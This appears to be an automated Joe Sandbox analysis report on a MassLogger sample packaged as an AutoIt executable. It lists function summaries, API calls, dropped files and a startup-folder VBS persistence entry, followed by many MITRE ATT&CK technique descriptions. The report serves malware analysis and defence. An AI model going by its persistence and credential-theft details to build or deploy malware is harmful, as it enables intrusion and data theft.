Instruction Fuzzy Hash: DBE06D742047209FD761DF69E5483827AE4BF04714F018A6DE896C7A62E7F5E808CBA1

Function 001D7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001D7C82

Part of subcall function 001A3358: _doexit.LIBCMT ref: 001A3362

Strings

Error allocating memory., xrefs: 001D7C7B
AutoIt, xrefs: 001D7C76

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f12328c23587c9b0dfb053ee6028c9427e8036b179a246ec6bc543f9bba5e066
Instruction ID: a2c70a05b3c9ffaa3a53779adf1061bf696deef68c71b528197b109e4cf9c5f8
Opcode Fuzzy Hash: f12328c23587c9b0dfb053ee6028c9427e8036b179a246ec6bc543f9bba5e066
Instruction Fuzzy Hash: 0CD05B323D83183BD52532B56D07FCB758C4F26B52F040416FB14595D34FE245D052E5

Function 001C1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 001C1775

Part of subcall function 001FBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,001C195E,?), ref: 001FBFFE
Part of subcall function 001FBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001FC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 001C196D

Strings

WIN_XPe, xrefs: 001C1788

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: c435ac7b9ed549f22df18ac46aef854d027b63415ebcf2baa898d0b16ad49e5e
Instruction ID: 055fb7d6c7026b601c35adc68c1ef3a4c5b84b246eefca0893d10343624317ea
Opcode Fuzzy Hash: c435ac7b9ed549f22df18ac46aef854d027b63415ebcf2baa898d0b16ad49e5e
Instruction Fuzzy Hash: 1FF0E570844209EFDB29DB51D998FECB7F8BB19301F540099E101B6552D7718F45DFA1

Function 00205964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0020596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00205981

Part of subcall function 001E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E52BC

Strings

Shell_TrayWnd, xrefs: 00205967

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 859bee04b3443ec502ed9d2c6f7e1950e130b2c84fbe0b554144d480b51c6990
Instruction ID: 53e5720a00204a9bdd371630cdb67203dd3e85d162c53f48dc7367d9a4821db7
Opcode Fuzzy Hash: 859bee04b3443ec502ed9d2c6f7e1950e130b2c84fbe0b554144d480b51c6990
Instruction Fuzzy Hash: F2D0A9313C4301B6E6B8AB30AC0FFA62A29AB00B00F000824B309AA0D1C9E09800C650

Function 00205998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002059AE
PostMessageW.USER32(00000000), ref: 002059B5

Part of subcall function 001E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E52BC

Strings

Shell_TrayWnd, xrefs: 002059A7

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0ef9c652b277b5d4d95585701ab496965362ce80431fa4e2a7a11f548dbbe13d
Instruction ID: c58fee37c228c2fba0cfc9b73a11a14f5aabe381f51440845ee9d6eb41407aaf
Opcode Fuzzy Hash: 0ef9c652b277b5d4d95585701ab496965362ce80431fa4e2a7a11f548dbbe13d
Instruction Fuzzy Hash: FED0A9313C0301BAE6B8AB30AC0FF962A29AB00B00F000824B305AA0D1C9E0A800C654

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tNXl4XhgmV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Ramada

C:\Users\user\AppData\Local\Temp\aut38CE.tmp

C:\Users\user\AppData\Local\Temp\aut3C0A.tmp

C:\Users\user\AppData\Local\Temp\aut6C61.tmp

C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
tNXl4XhgmV.exe

Function 00183B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 001849A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00184E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 001E9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre